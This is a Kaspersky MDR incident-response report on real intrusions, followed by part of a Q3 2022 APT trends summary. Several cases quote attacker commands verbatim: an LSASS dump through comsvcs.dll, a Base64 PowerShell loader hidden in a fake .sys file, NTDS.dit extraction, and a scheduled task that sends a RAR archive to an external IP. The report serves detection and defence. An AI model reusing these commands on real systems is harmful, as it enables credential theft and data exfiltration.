hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence] hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.

Case detection

The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description T1588.002: Tool
  1. AM engine detection on beacon
AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter A malicious payload was executed in the victim’s system and started communicating with the C&C server T1620: Reflective Code Loading
  1. AM detection in memory
AM verdict: MEM:Trojan.Win64.Cobalt.gen The malicious payload migrated to the victim’s memory
  1. Process injection
Detection of code injection from an unknown binary into a system binary T1071.001: Web Protocols
  1. HTTP connection
  2. Process start
Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level The attacker’s communications with the C&C server T1584.006: Web Services
  1. HTTP connection
URL reputation, regular expression in URL The attacker’s communications with the C&C server T1102.001: Dead Drop Resolver
  1. HTTP connection
URL reputation, regular expression in URL The attacker’s communications with the C&C server T1003.001: LSASS Memory
  1. AM detection on suspicious activity
AM detection on lsass memory access The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file
  1. Process start
Regex on command like: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full T1546.003: Windows Management Instrumentation Event Subscription
  1. Windows event
  2. WMI activity
WMI active script event consumer created remotely The attacker gained persistence through active WMI Payload hidden in long text Case #1: A scheduled task that loads content from a long text file Case description

This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:

Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9

Command:

"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes from the Base64-encoded content of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, and then executes the latter.

The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.

The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).

The decoded payload contained a link to a C&C server:

Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe

The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.

Case detection

The table below lists the attack techniques and how they were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description T1547.001: Registry Run Keys / Startup Folder
  1. Autostart entry
Regex on autostart entry details Malicious persistence
  1. AM detection
Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen T1059.001: PowerShell
  1. Autostart entry
Regex on autostart entry details Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression” T1216.001: System Script Proxy Execution
  1. Process start
Regex on command line Malicious payload execution via C:\Windows\System32\
SyncAppvPublishingSer
ver.vbs T1204.002: Malicious File
  1. Process start
Execution sequence: svchost.exe
→ explorer.exe → patch.exe
From directory: C:\Users\<
removed>\Downloads\ExcelAnaly
zer 3.4.3\crack\ The user executed a file downloaded by the Tixati BitTorrent client
As a result, the file 02f4f239-0922-49fe-
a338-c7460cb37d95.sys was created
  1. Local file operation
Creation of
c:\users\<removed>\downloads\ex
celanalyzer
3.4.3\setup_excelanalyzer.exe
In this order: chrome.exe →
tixati.exe
  1. Local file operation
Creation of 02f4f239-0922-49fe-
a338-c7460cb37d95.sys
In this order: svchost.exe →
patch.exe
Process command line:
“C:\Users\<removed>\Downloads\
ExcelAnalyzer
3.4.3\crack\Patch.exe”
The contents of 02f4f239-0922-
49fe-a338-c7460cb37d95.sys do
not match the extension (text
instead of binary). T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response 02f4f239-0922-49fe-a338-
c7460cb37d95.sys contained text;
starting on line 4890, it contained
a Base-64-encoded payload. Attacker hid payload T1071.001: Web Protocols
  1. HTTP connection
  2. Network connection
The SOC checked for successful connections to the discovered C&C server. A search for the attacker’s possible attempts to execute further stages of the attack Server-side attacks on the perimeter Case #1: A ProxyShell vulnerability in Microsoft Exchange Case description

During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx

The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.

Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

Similar behavior was detected the next day, this time an attempt at creating one file:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx

KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description T1190: Exploit Public-Facing Application
  1. AM detection
Heuristic AM engine verdict: PDM:Exploit.Win32.Generic Exploitation attempt T1505.003: Web Shell
  1. Local file operation
Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process Web shell file creation Case #2: MS SQL Server exploitation Case description

The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).

The SQL Server process attempted to create a suspicious file:

c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp

We observed that a suspicious assembly was loaded to the sqlserver process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe) db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16) with the original file name evilclr.dll.

The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.

The SQL server host had previously been seen accessible from the Internet and in the process of being scanned by a TOR network.

After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:

The created SQL jobs attempted to connect to URLs like those shown below:

hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png

Some of the IP addresses were already on the deny list, while others were added in response to this incident.

We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.

The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.

Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
  1. Network connection
  2. AM detection
Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine. The attacker scanned the SQL Server host T1190: Exploit Public-Facing Application
  1. Process start
The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe The attacker successfully exploited the SQL server
  1. Autostart entry
Execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd; original file name: evilclr.dll T1059.001: PowerShell
  1. Autostart entry
  2. Process start
Command line analysis showed the use of PowerShell. Malicious persistence via an SQL Server job T1027: Obfuscated Files or Information
  1. Autostart entry
Regex- and ML-based analysis of the SQL Server Agent job command line The attacker attempted to evade detection
  1. Process start
Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line T1505.001: SQL Stored Procedures
  1. Autostart entry
SQL Server Agent job analysis Malicious persistence via an SQL Server job
  1. AM detection
  2. AM detection on suspicious activity
Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a T1071.001: Web Protocols
  1. HTTP connection
  2. AM detection
The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server. The attacker’s C&C server What does exfiltration in a real-life APT look like? Case #1: Collecting and stealing documents Case description

Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:

“cmd.exe” /c “c:\perflogs\1.bat”, which started:

findstr "10.<…cut…>. wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1 wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\ UpdateStore\windnphd.exe:

C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2 query user C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3> C:\Windows\system32\cmd.exe /C net group "domain admins" /domain C:\Windows\system32\cmd.exe /C ping <hostname1> C:\Windows\system32\cmd.exe /C vssadmin list shadows C:\Windows\system32\cmd.exe /C ipconfig /all C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$

Suspicious commands triggering actions in the Active Directory Database were executed:

C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit C:\Windows\system32\cmd.exe /C dir c:\ C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit After these commands were executed, the windnphd.exe process started an HTTP connection:
hxxp[:]//31.192.234[.]60:53/useintget Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:
nd.exe c:\windows\system32\config\system c:\users\public\sys.txt nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\ rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\ Later, the SOC observed that a suspicious scheduled task had been created on the same host:
schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f The task executed a suspicious file: c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320)

This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

The 0816-s.rar archive was created via remote execution of the following command through psexec:

rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"

After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

Similar suspicious behavior was detected on another host, <hostname>.

First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

Next, a task was created remotely via psexec.exe:

schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\winpdasd.exe" /f

During task execution, an external network communication was detected, and certain discovery commands were executed:

hxxp://31[.]192.234.60:53/useintget ping 10.<…cut…> -n 1 query user net use

This was followed by a connection to a network share on the host 10.<…cut…> as username3:

C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>

More reconnaissance command executions were detected:

C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod

Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f

After that, C&C communications were detected:

hxxp://139.162.35[.]70:53/micsoftgp

This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description T1569.002: Service Execution
  1. Process start
Command line analysis The attacker performed reconnaissance and search in local logs
The attacker persisted in the victim’s system through service creation
  1. Windows event
Windows events on service installation and service start
  1. AM detection on suspicious activity
AM behavior analysis The attacker executed windnphd.exe through psexec T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
  1. Process start
Command line analysis The attacker performed internal reconnaissance T1021.002: SMB/Windows Admin Shares
  1. Share access
Inbound and outbound share access The attacker tried to access:
\\10.<…cut…>.65\ipc$
\\10.<…cut…>.52\c$ T1003.003: NTDS
  1. Process start
Command line analysis The attacker accessed NTDS.dit with ntdsutil T1071.001: Web Protocols
  1. HTTP connection
  2. Network connection
The SOC checked if the data transfer was successful The attacker communicated with the C&C server at hxxp[:]//31.192.234[
.]60:53/useintget
  1. AM detection on suspicious activity
The connection was initiated by the suspicious process windnphd.exe T1571: Non-Standard Port
  1. HTTP connection
  2. Network connection
The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port Attacker used the C&C server hxxp[:]//31.192.234[
.]60:53/useintget T1587.001: Malware
  1. Local file operation
  2. Process start
  3. AM detection on suspicious activity
Use of various suspicious binaries prepared by the attacker specifically for this attack The attacker used custom tools:
s.exe
winpdasd.exe
windpchsvc.exe
(see detailed report below) T1497: Virtualization/Sandbox Evasion
  1. Malware analysis
Detected the HookSleep function (see below) The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe T1036.005: Match Legitimate Name or Location
  1. Local file operation
  2. Malware analysis
Operations with the file c:\users\Default\ntusers.dat The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat T1140: Deobfuscate/Decode Files or Information
  1. Local file operation
  2. Malware analysis
The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe The attacker executed arbitrary code T1560.001: Archive via Utility
  1. Process start
Use of the RAR archiver for data collection The attacker archived the stolen credentials and documents T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
  1. Process start
Command line analysis The attacker used a custom tool to exfiltrate data
  1. Network connection
Analysis of the process that initiated the connection An analysis of the custom tools used by the attacker windpchsvc.exe and winpdasd.exe

Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

Both files read in from a file intended to deceive investigators and users by applying naming conventions that are similar to system files:

Payload file for windpchsvc.exe

The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

A similar file name was used for the winpdasd.exe malware:

Payload file for winpdasd.exe

The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):

windpchsvc.exe: decode, allocate memory, copy to mem, execute

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.

Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

The decompiled function can be seen below:

The “HookSleep” function found in both files, decompiled

When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:

The Sleep function redirected back to the malware code

s.exe

This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

s.exe <file> <IP address> <port> <up|down>

This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.

The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:

Decompiled network transfer tool

[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.

APT trends report Q3 2022

1 Listopad, 2022 - 09:00

For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research; and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2022.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

On July 7, CISA issued an alert, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector“, based on a Stairwell report about Maui ransomware. We can confirm a Maui ransomware incident in 2022, but we would expand their “first seen” date from the reported May 2021 to April 15, 2021, and the geolocation of the target to Japan and India. Since the malware in this incident was compiled on April 15, 2021, and compilation dates are the same for all known samples, this incident is likely to be the first involving Maui ransomware. No useful information is provided in the CISA report attributing the ransomware to a North Korean actor, but we found that approximately 10 hours prior to deploying Maui to the system the group also deployed a variant of DTrack to the system. This and other data points should help solidify attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly) with low-to-medium confidence. You can read our public report on Andariel’s use of DTrack and Maui here.

DTrack is a backdoor used by subsets of the Lazarus group. The backdoor has been used in a variety of attacks, including ransomware attacks and espionage campaigns. We have reported it several times in the past and also more recently, as it plays an important role in Lazarus’s activity. In March, we detected new DTrack samples packed in a different way and with relatively few changes in the code. In our report that will be published in November, we will analyze this latest set of samples in detail, describing the changes and the packing mechanisms. We will also highlight new victimology, including various targets across Europe.

Russian-speaking activity

We first documented the threat actor HotCousin in 2021 as a cluster of malicious activities leveraging the EnvyScout implant, publicly attributed to Dark Halo (NOBELIUM) by Microsoft. Our recent investigations show that this year, from February at least, HotCousin has attempted to compromise foreign affairs ministries in Europe, Asia, Africa and South America. The group’s TTPs remained consistent with those we described before. The victims are targeted with spear-phishing emails that trick them into mounting a malicious ISO file and double-clicking an LNK, which starts the infection chain. The first infection usually aims to install a downloader, which attempts to download other malicious implants from legitimate web services. The final payload is typically a commercially available implant such as Cobalt Strike. Some of these activities were also observed by other vendors, notably with descriptions of downloaders that obtain additional implants from external services such as Dropbox, Google Drive and Trello. In most cases, the targets appear to be diplomatic and government organizations in Europe. We are still unable to identify any significant link between HotCousin and Dark Halo/NOBELIUM or The Dukes/APT29; but the targets, techniques and tradecraft all coincide with activities that are publicly described as APT29.

Chinese-speaking activity

At the beginning of 2021, Kaspersky published a private report about the A41APT campaign. This report included technical details of malware used in the campaign, such as Ecipekac, SodaMaster, P8RAT, FYAnti and QuasarRAT. Together with our research partners, we observed the activities of the A41APT campaign throughout 2021 and presented this research at the Japan Security Analyst Conference 2022 (“What We Can Do against the Chaotic A41APT Campaign”). In December 2021, Trend Micro also published a blogpost about their investigation into the latest activities of the threat actor behind the A41APT campaign, which they named Earth Tengshe. Trend Micro believes that this campaign has strong connections to the APT10 threat actor. Their blogpost also introduced new malware, dubbed Jackpot – previously unknown fileless malware targeting IIS servers. Our research findings overlapped with Trend Micro’s on some of the new TTPs, such as updated versions of SodaMaster and Ecipekac and a new malicious fileless IIS module dubbed IISBack. However, we also discovered a new malicious implant that has been used by this actor to deploy SodaMaster since 2015: we named this module HUI loader. Our research also revealed the evolution of some of the malware implants used by this threat actor over the years, such as Ecipekac and SodaMaster.

Since April, we have detected a number of KeyPlug malware samples being deployed in the systems of high-profile victims in Asian countries, with some traces going back to late 2021. KeyPlug is a modular backdoor with the capability of communicating to its server via several network communication protocols set in its XOR-encrypted embedded configuration block. The server infrastructure is mostly based on Cloudflare CDN, with each of the malware samples we have collected containing only one domain and several IP addresses that all point to the same domain on the CDN network. Once connected to the server, the malware downloads further modules as plugins and loads them on the victim’s machine. The malware and the infrastructure used in these attacks have similarities with previously known APT41 activities. However, these attacks can only be attributed to APT41 with medium confidence; and it is also possible that another threat actor is behind the attacks.

We recently analyzed the targeting of online gambling platform development studios and IT recruitment organizations by DiceyF, using the GamePlayerFramework. This is related to older PuppetLoader code, but has been re-designed and re-written in C#. DiceyF steals code-signing certificates to digitally sign malware, embeds artefacts and strings within its malware mimicking the legitimate software signed with these certificates, and then distributes the signed malware via software distribution servers. Most targets were in Hong Kong and the Philippines, but there were also some in China and Vietnam.

In March, we observed the use of a Microsoft Word file as the infection vector in some attacks. In June, we found a SFX file using a decoy file containing Japanese content. We also discovered a new downloader shellcode, that we dubbed DOWNIISSA, used to deploy the LODEINFO backdoor. While the targets are Japanese and consistent with the usual victimology of APT10, we also found hints of possible operations in Russia and Malaysia. Furthermore, we investigated new versions of LODEINFO shellcode, namely v0.5.9, v0.6.2, v0.6.3 and v0.6.5, in March, April and May respectively. These findings show that APT10, which appeared to be inactive for some time, has resumed its activities with the new version of LODEINFO.

In April, our product detected CobaltStrike loaders in a diplomatic organization in APAC that has been targeted by several APT actors in the past. The loaders caught our attention because one of them displayed a legitimate digital signature from a software development company, whom we alerted to the incident. Digging deeper, we found several variants leveraging either HTTP or raw TCP communication protocols and discovered traces of post-exploitation activities related to them, as well as simultaneous use of Radmin and Gh0stRAT. Natural language artefacts and weak TTPs indicate that this attack may be attributed to Chinese-speaking attackers, but we were unable to tie this activity to any existing group. In fact, we couldn’t find any other use of the droppers presented in our report beyond this incident.

Middle East

We recently discovered and analyzed FramedGolf, a previously undocumented IIS backdoor that could only be found in Iran and which was designed to establish a persistent foothold in targeted organizations. Notably, the backdoor has been deployed after successful exploitation of ProxyLogon-type vulnerabilities on Exchange servers. The malware has been used to compromise at least a dozen organizations, starting in April 2021 at the latest, with most still compromised in late June 2022.

SoleDragon is complex malware used by the SilentBreak threat group. Kaspersky first discovered this malware in 2018, together with the CVE-2018-8453 vulnerability. In 2019, SoleDragon was also deployed through Skype. After that, there was no information about SoleDragon until we detected two new implants at the end of 2021. The implants, which targeted organizations in the Middle East, share code similarities with older SoleDragon samples. One of the newly discovered implants is a C++ backdoor, SoleExecutor, that waits for an activation message, then receives a DLL and launches it; the other implant is a keylogger we dubbed Powerpol.

In June, we identified a previously unknown Android spyware app that targets Persian-speaking individuals. SandStrike is distributed as a means to access resources about the Baháʼí religion that are banned in Iran. It provides victims with a VPN connection that can be used to browse these resources. The spyware itself collects various data from the victims’ devices, such as call logs or lists of contacts. During execution, it connects to the C2 server to request commands: these commands allow attackers to perform operations with the device file system.

DeftTorero (aka Lebanese Cedar, Volatile Cedar) is an APT actor that probably originates from the Middle East and is known to focus on victims in the same region. While its activities have been observed since 2012, its presence was only revealed in 2015 (Kaspersky was among the first to report it) and no public activity was recorded until January 2021. The public reports available to date expose and discuss the final payload – Explosive RAT – and the web shells used in the initial foothold, with little on TTPs. Our report focuses much more on the TTPs used by the threat actor in intrusions between late 2019 and mid-2021. Based on our telemetry, the January 2021 indicators do not necessarily represent new intrusions or new malware samples, as the detections were relatively old (between 2018 and 2020), and the Explosive RAT samples did not contain significant modifications. Analyzing previous intrusions, we suspect the gap in new detections is due to the fact that the threat actors were (and possibly still are) using fileless techniques and public offensive tools used by many threat actors, such as Metasploit, Mimikatz, Crackmapexec, known web shells, and other known tools. This gives the operators a level of anonymity in compromising their targets and victims.

Southeast Asia and Korean Peninsula

We observed a rise in the use of the DeathNote cluster recently. In March, we saw Lazarus use it against victims in South Korea. The actor possibly used a strategic web compromise, employing an infection chain similar to that which we previously reported, abusing an endpoint security program. However, we discovered that the malware and infection schemes have been updated. The attacker used a multi-stage infection, starting with the Racket Downloader. Through Racket Downloader, the operator deployed additional malware for further post-exploitation activity. In this phase, the actor used malware that we hadn’t seen before, with minimal functionality to execute commands from the C2 server. Using this implanted backdoor, the operator conducted many hands-on keyboard activities. They lurked in this victim’s environment for a month and executed various commands to collect basic system information. Also, we observed how they attempted to find valuable hosts with high privileges, such as file servers or Active Directory servers. Lazarus Group delivered additional malware such as a keylogger and password-dumping tool to collect more information. Moreover, as a result of working closely with KrCERT, we had a chance to look into the adversary’s C2 scripts. They employed a similar C2 structure as before, compromising a web server and configuring a multi-stage C2 server, with the first stage server acting as a proxy server and the second stage server used for controlling victims.

We uncovered an ongoing campaign targeting defense contractors in South Africa and Brazil. The threat actor behind the attacks contacted potential victims via social media or email and sent the initial malware through Skype. The malware is a Trojanized PDF application that initiates a multi-stage infection chain, loading additional payloads that contain C2 communication capability via the DLL sideloading technique. Additionally, the threat actor deployed additional malware to the initial host to pivot and perform lateral movement. In this process, the operator took advantage of a relatively new DLL sideloading technique named ServiceMove. This technique was introduced by a red team researcher and abused the Windows Perception Simulation Service to load arbitrary DLL files for malicious purposes. This notorious threat actor operates several clusters and attacks various targets based on its intentions. In one of the victims, we observed a similar initial infection vector. However, the actor used different malware. Lazarus Group is equipped with various tools and employs them with various infection chains. While examining all the samples in this case, we observed different clusters: ThreatNeedle, Bookcode, and DeathNote.

